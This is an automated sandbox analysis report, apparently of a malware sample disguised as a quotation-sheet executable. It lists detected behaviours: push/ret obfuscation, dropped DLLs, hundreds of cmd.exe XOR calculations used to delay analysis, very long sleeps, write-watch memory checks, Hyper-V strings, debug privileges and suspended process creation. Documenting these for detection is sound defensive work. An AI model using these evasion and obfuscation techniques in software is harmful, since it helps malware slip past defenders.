Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016B4ED pushfd ; iretd 131_2_0016B4F2
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DD00FA pushad ; retf 131_2_37DD00FB
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DEB9FA pushad ; retf 131_2_37DEB9FF
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DEB91B pushad ; retf 131_2_37DEB926
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DEA65F push esp; ret 131_2_37DEA68D
Drops PE files
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll Jump to dropped file
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Mass process execution to delay analysis
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe API/Special instruction interceptor: Address: 26A4F38
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Memory allocated: 34CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Memory allocated: 36CB0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Thread delayed: delay time: 600000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe API coverage: 2.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00406167 FindFirstFileA,FindClose, 0_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00406167 FindFirstFileA,FindClose, 131_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 131_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00402688 FindFirstFileA, 131_2_00402688
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Thread delayed: delay time: 600000 Jump to behavior
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe API call chain: ExitProcess graph end node
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Enables debug privileges
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
